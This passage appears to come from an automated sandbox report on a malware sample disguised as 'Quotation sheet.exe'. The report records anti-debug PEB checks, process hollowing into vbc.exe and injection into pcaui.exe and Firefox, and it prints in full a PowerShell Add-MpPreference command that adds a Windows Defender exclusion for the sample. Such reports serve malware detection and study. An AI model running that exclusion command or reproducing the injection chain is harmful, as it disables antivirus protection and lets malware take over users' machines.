                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05360124 mov eax, dword ptr fs:[00000030h]7_2_05360124
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404164 mov eax, dword ptr fs:[00000030h]7_2_05404164
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404164 mov eax, dword ptr fs:[00000030h]7_2_05404164
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DA118 mov ecx, dword ptr fs:[00000030h]7_2_053DA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DA118 mov eax, dword ptr fs:[00000030h]7_2_053DA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DA118 mov eax, dword ptr fs:[00000030h]7_2_053DA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DA118 mov eax, dword ptr fs:[00000030h]7_2_053DA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F0115 mov eax, dword ptr fs:[00000030h]7_2_053F0115
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov eax, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov ecx, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov eax, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov eax, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov ecx, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov eax, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov eax, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov ecx, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov eax, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov ecx, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532C156 mov eax, dword ptr fs:[00000030h]7_2_0532C156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C8158 mov eax, dword ptr fs:[00000030h]7_2_053C8158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05336154 mov eax, dword ptr fs:[00000030h]7_2_05336154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05336154 mov eax, dword ptr fs:[00000030h]7_2_05336154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C4144 mov eax, dword ptr fs:[00000030h]7_2_053C4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C4144 mov eax, dword ptr fs:[00000030h]7_2_053C4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C4144 mov ecx, dword ptr fs:[00000030h]7_2_053C4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C4144 mov eax, dword ptr fs:[00000030h]7_2_053C4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C4144 mov eax, dword ptr fs:[00000030h]7_2_053C4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B019F mov eax, dword ptr fs:[00000030h]7_2_053B019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B019F mov eax, dword ptr fs:[00000030h]7_2_053B019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B019F mov eax, dword ptr fs:[00000030h]7_2_053B019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B019F mov eax, dword ptr fs:[00000030h]7_2_053B019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532A197 mov eax, dword ptr fs:[00000030h]7_2_0532A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532A197 mov eax, dword ptr fs:[00000030h]7_2_0532A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532A197 mov eax, dword ptr fs:[00000030h]7_2_0532A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_054061E5 mov eax, dword ptr fs:[00000030h]7_2_054061E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05370185 mov eax, dword ptr fs:[00000030h]7_2_05370185
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EC188 mov eax, dword ptr fs:[00000030h]7_2_053EC188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EC188 mov eax, dword ptr fs:[00000030h]7_2_053EC188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4180 mov eax, dword ptr fs:[00000030h]7_2_053D4180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4180 mov eax, dword ptr fs:[00000030h]7_2_053D4180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053601F8 mov eax, dword ptr fs:[00000030h]7_2_053601F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE1D0 mov eax, dword ptr fs:[00000030h]7_2_053AE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB5 mov eax, dword ptr fs:[00000030h]7_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053ACCA0 mov ecx, dword ptr fs:[00000030h]7_2_053ACCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053ACCA0 mov eax, dword ptr fs:[00000030h]7_2_053ACCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053ACCA0 mov eax, dword ptr fs:[00000030h]7_2_053ACCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053ACCA0 mov eax, dword ptr fs:[00000030h]7_2_053ACCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05328C8D mov eax, dword ptr fs:[00000030h]7_2_05328C8D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362CF0 mov eax, dword ptr fs:[00000030h]7_2_05362CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362CF0 mov eax, dword ptr fs:[00000030h]7_2_05362CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362CF0 mov eax, dword ptr fs:[00000030h]7_2_05362CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362CF0 mov eax, dword ptr fs:[00000030h]7_2_05362CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05328CD0 mov eax, dword ptr fs:[00000030h]7_2_05328CD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CCC8 mov eax, dword ptr fs:[00000030h]7_2_0532CCC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535EF28 mov eax, dword ptr fs:[00000030h]7_2_0535EF28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332F12 mov eax, dword ptr fs:[00000030h]7_2_05332F12
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404F68 mov eax, dword ptr fs:[00000030h]7_2_05404F68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536CF1F mov eax, dword ptr fs:[00000030h]7_2_0536CF1F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E6F00 mov eax, dword ptr fs:[00000030h]7_2_053E6F00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AF69 mov eax, dword ptr fs:[00000030h]7_2_0535AF69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AF69 mov eax, dword ptr fs:[00000030h]7_2_0535AF69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D2F60 mov eax, dword ptr fs:[00000030h]7_2_053D2F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D2F60 mov eax, dword ptr fs:[00000030h]7_2_053D2F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CF50 mov eax, dword ptr fs:[00000030h]7_2_0532CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CF50 mov eax, dword ptr fs:[00000030h]7_2_0532CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CF50 mov eax, dword ptr fs:[00000030h]7_2_0532CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CF50 mov eax, dword ptr fs:[00000030h]7_2_0532CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CF50 mov eax, dword ptr fs:[00000030h]7_2_0532CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CF50 mov eax, dword ptr fs:[00000030h]7_2_0532CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536CF50 mov eax, dword ptr fs:[00000030h]7_2_0536CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D0F50 mov eax, dword ptr fs:[00000030h]7_2_053D0F50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4F40 mov eax, dword ptr fs:[00000030h]7_2_053B4F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4F40 mov eax, dword ptr fs:[00000030h]7_2_053B4F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4F40 mov eax, dword ptr fs:[00000030h]7_2_053B4F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4F40 mov eax, dword ptr fs:[00000030h]7_2_053B4F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4F42 mov eax, dword ptr fs:[00000030h]7_2_053D4F42
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404FE7 mov eax, dword ptr fs:[00000030h]7_2_05404FE7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362F98 mov eax, dword ptr fs:[00000030h]7_2_05362F98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362F98 mov eax, dword ptr fs:[00000030h]7_2_05362F98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536CF80 mov eax, dword ptr fs:[00000030h]7_2_0536CF80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05370FF6 mov eax, dword ptr fs:[00000030h]7_2_05370FF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05370FF6 mov eax, dword ptr fs:[00000030h]7_2_05370FF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05370FF6 mov eax, dword ptr fs:[00000030h]7_2_05370FF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05370FF6 mov eax, dword ptr fs:[00000030h]7_2_05370FF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E6FF7 mov eax, dword ptr fs:[00000030h]7_2_053E6FF7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534CFE0 mov eax, dword ptr fs:[00000030h]7_2_0534CFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534CFE0 mov eax, dword ptr fs:[00000030h]7_2_0534CFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532EFD8 mov eax, dword ptr fs:[00000030h]7_2_0532EFD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532EFD8 mov eax, dword ptr fs:[00000030h]7_2_0532EFD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532EFD8 mov eax, dword ptr fs:[00000030h]7_2_0532EFD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332FC8 mov eax, dword ptr fs:[00000030h]7_2_05332FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332FC8 mov eax, dword ptr fs:[00000030h]7_2_05332FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332FC8 mov eax, dword ptr fs:[00000030h]7_2_05332FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332FC8 mov eax, dword ptr fs:[00000030h]7_2_05332FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05402E4F mov eax, dword ptr fs:[00000030h]7_2_05402E4F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05402E4F mov eax, dword ptr fs:[00000030h]7_2_05402E4F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C6E20 mov eax, dword ptr fs:[00000030h]7_2_053C6E20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C6E20 mov eax, dword ptr fs:[00000030h]7_2_053C6E20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C6E20 mov ecx, dword ptr fs:[00000030h]7_2_053C6E20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05328E1D mov eax, dword ptr fs:[00000030h]7_2_05328E1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AE00 mov eax, dword ptr fs:[00000030h]7_2_0535AE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AE00 mov eax, dword ptr fs:[00000030h]7_2_0535AE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AE00 mov eax, dword ptr fs:[00000030h]7_2_0535AE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AE00 mov ecx, dword ptr fs:[00000030h]7_2_0535AE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535AE00 mov eax, dword ptr fs:[00000030h]7_2_0535AE00
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\Quotation sheet.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe"
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                        NtResumeThread: Direct from: 0x773836AC
                        NtMapViewOfSection: Direct from: 0x77382D1C
                        NtWriteVirtualMemory: Direct from: 0x77382E3C
                        NtProtectVirtualMemory: Direct from: 0x77382F9C
                        NtSetInformationThread: Direct from: 0x773763F9
                        NtCreateMutant: Direct from: 0x773835CC
                        NtNotifyChangeKey: Direct from: 0x77383C2C
                        NtSetInformationProcess: Direct from: 0x77382C5C
                        NtCreateUserProcess: Direct from: 0x7738371C
                        NtQueryInformationProcess: Direct from: 0x77382C26
                        NtResumeThread: Direct from: 0x77382FBC
                        NtWriteVirtualMemory: Direct from: 0x7738490C
                        NtAllocateVirtualMemory: Direct from: 0x77383C9C
                        NtReadFile: Direct from: 0x77382ADC
                        NtAllocateVirtualMemory: Direct from: 0x77382BFC
                        NtDelayExecution: Direct from: 0x77382DDC
                        NtQuerySystemInformation: Direct from: 0x77382DFC
                        NtOpenSection: Direct from: 0x77382E0C
                        NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                        NtQuerySystemInformation: Direct from: 0x773848CC
                        NtReadVirtualMemory: Direct from: 0x77382E8C
                        NtCreateKey: Direct from: 0x77382C6C
                        NtClose: Direct from: 0x77382B6C
                        NtAllocateVirtualMemory: Direct from: 0x773848EC
                        NtQueryAttributesFile: Direct from: 0x77382E6C
                        NtSetInformationThread: Direct from: 0x77382B4C
                        NtTerminateThread: Direct from: 0x77382FCC
                        NtQueryInformationToken: Direct from: 0x77382CAC
                        NtOpenKeyEx: Direct from: 0x77382B9C
                        NtAllocateVirtualMemory: Direct from: 0x77382BEC
                        NtDeviceIoControlFile: Direct from: 0x77382AEC
                        NtCreateFile: Direct from: 0x77382FEC
                        NtOpenFile: Direct from: 0x77382DCC
                        NtProtectVirtualMemory: Direct from: 0x77377B2E
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: NULL target: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe protection: execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: NULL target: C:\Windows\SysWOW64\pcaui.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\pcaui.exe Section loaded: NULL target: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe protection: read write
                      Source: C:\Windows\SysWOW64\pcaui.exe Section loaded: NULL target: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\pcaui.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\pcaui.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\pcaui.exe Thread register set: target process: 5876
                      Source: C:\Windows\SysWOW64\pcaui.exe Thread APC queued: target process: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 738008
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe"
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe Process created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
                      Source: C:\Windows\SysWOW64\pcaui.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: UsMxwwTDRUHSSD.exe, 00000008.00000002.3972572404.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000000.2363065025.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3972853012.0000000001110000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
                      Source: UsMxwwTDRUHSSD.exe, 00000008.00000002.3972572404.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000000.2363065025.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3972853012.0000000001110000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: UsMxwwTDRUHSSD.exe, 00000008.00000002.3972572404.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000000.2363065025.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3972853012.0000000001110000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                      Source: UsMxwwTDRUHSSD.exe, 00000008.00000002.3972572404.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000000.2363065025.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3972853012.0000000001110000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Queries volume information: C:\Users\user\Desktop\Quotation sheet.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Quotation sheet.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
